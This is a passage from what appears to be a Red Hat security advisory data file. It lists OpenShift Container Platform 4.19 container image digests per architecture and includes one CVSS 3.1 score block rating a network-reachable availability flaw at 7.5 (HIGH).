"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:2497f36ad41776147768069c63bab22f639770328273f69ef16473d41ce32278_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:269715c1fc118c5a352bb9a221e648f2fa24caabc0ae874d906e2947837b6a9a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:5a81fa31d2a53a7942e433df47983d0a9b17a3be01dc73802698a26c5a54557b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:5f6089d286cfa67bcf24b6860c840e503fe431f8df8557324d9fae2725ee6f0d_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:82412b7cf5683fb7a70749370015ea212339356d0443143e70ba439aba6d0b0f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:8e9affb2924d2c993f50e4baa132d3e3ddb4f1012154a80d9bf9114bddb10e49_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:9bb0d3806c90ff845c4dbe11678a15f2816a902e9fde4df463f3e85febdcfd8f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:d14dd6230f53078a6cf0d3b1528d0d22995add08578ab3da323a4ff92d13cc31_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:6f971e62173e3772bc6c474b3f796d93ef9f01e1d098705177f06a82f56601b9_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:988ab0315395f8580b26df4a0ebc13f53d47dd4bfb4160489f1d24c3c118c795_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:a51c6200b8f5a73c29e236c1a4ff59b61b54fe200fbed5f13d54583ea7f8f51e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:fc80f86e06eb2cc0fd6de0eebe896533169eb85bdd15e54b7b6a8e8722d3cf34_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:2d02a78de1b38dd1aa1159bffade3aaba19ee6ddf8b3a8f2b4a017cb2a6ea22e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:3f3e0469a0d159c94ffc5063f08fa8af255d1e620b359264211b196cb330eb4e_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:55f9b85e57f11e221edf4e30d65037caedd69a0a4d37d560d99225b992aa1cbb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:dbce78ed2734d0a9d61b3404fdcc6f4541b8dc5b95e4fb40b8f9157b002b2681_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:39dc4401c0fe4bdac4a4d5ff18880f92ce0cbf10e00208a564a50973ff2667b1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:50613490849c11ce84b306bf77e8fd0e2d5e8e74d0db805f1dd73e7877a3d8a4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:a0fa55daf82f32ede8a24f467db6f6591c5f5810f3dfa4c5b095fe5ba8274595_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:d17159405d993d6f0e812b36fc09809ae821807eadd5b9f1d448f4f188bd0e73_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:1de5b7823150dabafe0ca7d026012a02e03da9f95ebab9389d84f82c4fb83dc7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:b12d8b79849779424f3cffd8ff8da719904dadb5cdb018f0056f39b3ccb593f8_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:cba950803b92bd6bd4edf5f6e4c6f6f92cc899132e530d2508d142deeb9366cd_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:d5c61e25f1e62aab1c6a521f4184d3552fe23d82e3a080124bf8e38d4b2ba2cd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:68a9cd133540eed3257ca2d5fa6f8ef384c3f66cc3cb4a30c72228c3450bce49_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:92a4f2142815522fdeee0f26ed1841cb16c10ab93ec38512f64ce82a81a12bb6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:e80c61f3f591b4a682b352c787e1715f7d9f4f06e209ef8dc82e41b8bded9b8e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:f5f04cf85a80bba86be83c2fdd946e2efe511959a0ff382620bb9f7aa25b8c71_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:920a0d0905c6decac8fa8ae599192003df5391c6672f6c6f5eec3b6d9a8e0fee_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:a247fbc173026dc90407f375b79904dc8d29daecacd96333fa6ef80b3186e8eb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:a97b0c4ab3e8716aadd8773aac0e95cb23aaaf6b618a2f759a1a53ecf078345f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:fc7191fca813048d552379742516176d723b1b1616dd53dd5ac557d117437c7a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:2848880f87cf2488a841e371c990a81b83e44e08e7e4b1599c2009f078080d85_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:5ec6c4b928751540b436763b99127acafab69b5dfc867cd4cf74871697327698_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:730d5918dbf2f364e8528b6c8036541fbbee9e81c1bd5f6985f87b4602bc4579_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:9fe8545ad96791b55050941f86c99eef5b8b88b927c0e1953ce3ee703b6bf525_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:233b4ee8499922834ec87e62c2d4f322062f8063c99a95010bcf817e6114af6e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:337f863c631718a87bb7c6f86491aab519c0885ab1fe4184dd33df493da56386_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:350c76802bc5210c06f8ee9ac9a4a7f2474505132c1eab2607bfab309f59e5f3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:43aa5f0fe9244c1aaf3912b184ffee644522a2ff3bd3aadd53db5b90b0c93c76_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:28f0a87cf08f7f9134bbe4ca64a7bc38a8882ecb5c8c6d57d5bb8f9096cdb76b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:4a986e828ec8120aa34ff2e35fe51c1866af855ea48e21d41aaeddcb4563a5d7_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:8fc1c4e8704ed03a5515293ed3b18f9cf2f72b57bf97f6f646f0c4b7dfd47d65_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:c8a812560939b0a79d1b687f36dd5c5b71d01bea059b07e3652b35678884d330_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:515b6d09bed60aa703612507005248bbda01c940605101e93897805a7f1e4666_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:b36db241db3e48fdc932865032dbedaf9d94816523648f4345f19acba26cd7f4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:e8b6d45610b94825d1f5525443529e99a5e68441a8f331e20746614a606dc475_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:f3405b744680f7e937609958ff100453abb5a7cff06344997be0b0a7b7fa29e3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:0df3b71023897418a185bfc7a38f4f67e0a41b6733452fefd59c9d7edbec3df6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:49afa7e1da94ce712c27df4a3e01d4748b2a493b4c61527a8a895c24e3001648_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:afbb2ca0948d8280647626e33064e6fc0d72310244cd69e338efdcc1b1ea7c8b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:e689a8391301d7ce3ba922d5fee8624e5d7f9c7a23905f78a7171d9a182d3f1c_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:93ddc3e527257964b98d041a3d830c1be67f8c781f93d562c328c1dee7b37ef1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:97611bba51f02868cd922555e6c8e75d7eb4b5d8a865a69fd957084f897a5033_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:3a47a587be70333ba3719bb416fb04c176e41ce27d2c051b1210717857fd9b92_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:d48293acc1ecfd8e08eed3f47d3c37eb9d5905642a04e12ed26434a222ed0476_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:25f2667e3ce28ce5f0326be23f78cc6eedd523d4d2cdcfee2c02565d14d16ec2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:ec8e975cdae392efc948e02d0a30b98809739aff380a856ec97e0367fd1d0179_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:70ec66ac0b28bc34120378d962fdfe8a2f2411591611eaf6df7d4e62b8076a7f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:cc3b4055bc35dcc6c701bca3092202adbdbf5edefe3737167475ee2431fc30c1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:2b9e95c24afe6cdf775027984310e0388433100034ef17e8de50160370019063_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:47e0ce843654534a810ad00a3b0703d8abbf4b8f221c479bae47cceed4d944e1_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:6c081df14b51b5bffaaf126426c8919de0821a460c3a7ec80abf95581b749609_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:7f52c583cdba43b214630766d8f050b322c936307f28e1951b47d2fdecd11acb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:470582fb21bf68d82be5cb2548bb4fd55827624330297d62b246a69b831153cd_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:a362b4e6bd7979c2413fe2bed3f66be4a44508bf397115caa539fa0857e26527_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:c0935ced156f72b3a6a77ff11445c038bd0555d881b73c760c7291cc7d27749b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:f434571500312f9a43f76fb244efb3184388fa6c34e955228612364918c8f1c8_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:5fa811100ce565454ba1e243b9d0b94ca6f9f630fe159d4a7de104eb844039e8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:a40105662b9188d283206418a2884182a9aff74c2cf4f700df3bd69443773d8c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:bde91bb377421a028e30bb830721f120be505c245717b5e2a3e25e5e6754bd5a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:e4ca2b3866c381b5fbbf8f6be7f9a34f4dd86ef1f952624e28760ce20ca3be64_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:07c0eed66aca1eed3b7897a24d97c00cb77f592f9b6900c7fb2644b4cfae6797_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:399d1be8fdde89d24d645044e04a0f5c0c105629896692c5e856a69d1bc6b076_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:62e2f95a2e6d53f00bfed8b866c40378bfb1219b72ba6b4e9478d4753fcfa623_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:7f8f9a3bce37f846d92e13388b17cff7e606c59abf74b88e8932cc4eb17f5828_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:395c76d76ca411005e4edc332331e1e36152ac788e1a54a02975ad3478a7f5de_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:53d9fba19f9ae47a65713eb4127c1f0c672a04cb55ec52861af3124dd2fe1e30_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:ceceb8b787ae6f1e9f00e32e4914456ae8dfe3f47c50efbf55ed0d1bb3f6c78a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:f99105f06107aae1f680d94d03d2f90607286c026aca50a877063235773368c7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:6f39433829144540b1030be91fecb0b225ec0212fe0e63f4ff50c7d1e9461a38_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:6fc27364a010efdbaeb7ede2c4aeaf867a8743d4fa9af5f9b6a16149f945de69_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:8ce1023bff832cada7cd5754986f8f2a7e24df72eee17707ff6df3acdab58465_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:e838bcfd2b1e7bb1376baff2a9e83cfb712b35be02767f62f10acc4edf5b4890_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:4371bbcc4e87a108d9c6f2121c9120a5abcf32240f2c5b8fa4d9ff9023821d81_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:4f7944def4efb736d1bb91507ce49497840db06495408913b57591fd2f72ed22_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:bb6e5818c800f72e4318c715666b51239050a3e7a7b6e7fdf96ec3b343a419af_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:cfd82e42cdba7e0724a9b0c5b90d42d526913ac96104e3ab6b449b59c3f5f3ad_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:355c8c7080214dbcd15bf77122550909eda1b1a5a1bcbc695ce80a495518b066_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:38a241d766a8321cfda212df868c63751fab60d99d8f05c671c07b39fc2dd2bf_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:4efb83eb7fca945c2f8bbb8c141c87bd4b7c4bd1ad09998e0e52259bcda88bd2_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:81ae7211c791e2b2e8f9ae37ba0c935e1b8dc8edef9c412058519e813518e6e7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:37a306bd6ec2676ed92426fc7e69cc2a3169013c31997f1144a1f22750309582_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:42985904fd805f7e3afeb21e514100045bc0fc77b7f7a8b81ce63c892d7eba70_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:6b6894e000302c61bc4eb20795f86491c14cddc1110e2534442b399d0e22ebdf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:a97fadbd51c77b4a854ecf0c403936adbf136dc83af3213fcc35fd6d5d67679e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:132bb73fc0ee5add8ea39eda9e4acfc0e3fab4ab85d2fb959e9a359dfe2b7b79_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:30c2d5c0f6ccd61860e95309dc27f8a1412cc6cf6173fef9a48461186f296336_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:6440ce5a0f8c34fea0b65fd43d8415c03d2c8c074f47efab4a2e47182a126c38_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:8c4b496454f9e8fe0bc85b5d4feb01c4c8ea0935d946b900ada2531d2c294ed3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:458198718ad90fe2caed08f8ae82b2ce996d62cc6455672db992e7f9bbacbcd3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:5e6e5206c98ab903f70b3e7402ac1d0c4342577038cb5810a268ba235502a717_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:60ec51c360f250cf70fdd2442b9def1ec17e2ded2cefe158995d701a0a7ec525_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:a116039d2376221a308ad495493553e704358e9cfc2fa4104785f7dd7242b90a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:05e68f45e8578ef2401473deda111a57de11143bb3cd63f84742cfc1bdbde1de_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:99d76e0fcc4bd0f276d574ea2edad252b552301aa10e2e4241e0e9462fdd03e7_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:d3fbf646c682c41b45e5ac529e3fa35abdb2610c2e746bfe19a7a12867165968_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:ff983c80717ff42cf4c6484fa4c38a1df4c88fd40d4e05fa3c47434d949d256b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9-operator@sha256:bcba79c5b4e0adf2cb63a96b2d7a089bc5a7ef0960ea5a54d50a36761ea7033e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9@sha256:79ffc4eed49cdd6aa9854d731ea9f85ed37af6e274c04359f048afea038ed48f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-cloud-controller-manager-rhel9@sha256:fdf18e2f91a8d7dfed9ab25f41666e1f3ff3c2a49866a1ff557629602b9f4726_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-cluster-api-controllers-rhel9@sha256:75c7ccaeda39a8ede8e78244478c7fb3dd03c1523ef3dcda8982cc8cc74a7aee_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9-operator@sha256:bcba79c5b4e0adf2cb63a96b2d7a089bc5a7ef0960ea5a54d50a36761ea7033e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9@sha256:79ffc4eed49cdd6aa9854d731ea9f85ed37af6e274c04359f048afea038ed48f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-csi-driver-syncer-rhel9@sha256:0d1f878c9d72ed2e0cf721f35015c55385df1eb3eb9bf966bb7d626f7826baf3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-problem-detector-rhel9@sha256:0925ab89d006b1b2665e701f3943ad2684e31ce86408919378014ecb7f7403ed_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:0f1cb5f6dd220cb36e689dfa996022085bafe7a06aa6b8f3e4737ca281e143c4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:27a24944f1ef11eb36634a670dc865b5ff0a15d2e11905b82498916d8e9bf580_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:dcffbfba5a93e392e08fb0d010fd9b75694c4411016d09852fc51239d5234e9d_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:fe3bfd4f788d5fe7258d04338de8ba9df4638db341674caed43859927f6ee3f9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:15d38afb007a612060445e5725ead06ed81130b761b11661e608a0debe464d24_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:4e69689cecf4ba62c9a3b7305e80c15ad5fcccbc85fb59a7e2969e14c7fb85f3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:a7a04880260ecec43abbfe7546f34ab6db488e82574cd7e9b0befa5399b601e8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:dbca06ba2c04ea72c1eb33a6c9d1c075016531eb9f72fc589fe759e55a57c408_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a31c0d7654d2495710df721e8e1aa57ae47f028966ca83aaa1b74a5b57f0a276_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a657295bab1d29d15cdd77ce366dd388153b5783c054067ef0ecd1c84e76db4f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a95b88717fb16e809ea0b8654929e2808eb6fed3b84e45bbe3886e020d7acac4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:e5b07464aedee0bfb213c132174a22fc66e279eb8f7688078a07657237a8d334_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:4273b3050117faf7bb14fd2bbcf71c5606b7b6f1326fcc1a36cf3ed51f6b3de0_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:5a2ecf041953f1ac77ef2ff25b6ccbb1c7b7741bcca8eab2bdeae706019f6c83_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:9874d99c0cb18c7120982f093f99fde589255ef5cfb1c67b6a6e95cf66f87a91_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:e5c889f9c92df65efd279220829dc129023a34fd6c4b4d93264739852581cd93_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:35cd98a46072b8c966553d8bb60bc4ed2f3c055eeaf3e7c4d080ec9605f6a96f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:6a108c888888fc9a2fb0a3b834aab6eb2a6c0b691a39e3461725f87580062a91_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:6d2feee745979668785a904900f8c9d5327477f83361f26eb5879e87e081bd25_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:c17c46279d5ad92b5ad7a58a1dc1bb8331b15ab424e7274818a1c47898b528e2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:055fea2fc51b9eb48327b78542f420a1d65dbcf786324f7bcbeda053d3fd35bc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:1d66a8807c27cd43c86399e67ec86906edb97be4ca38b4a752bef1c880848083_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:980e2f5e0f0676e559e91d50e2927fb9bf2f598db0d1ba043440e04d76cf46b9_amd64",
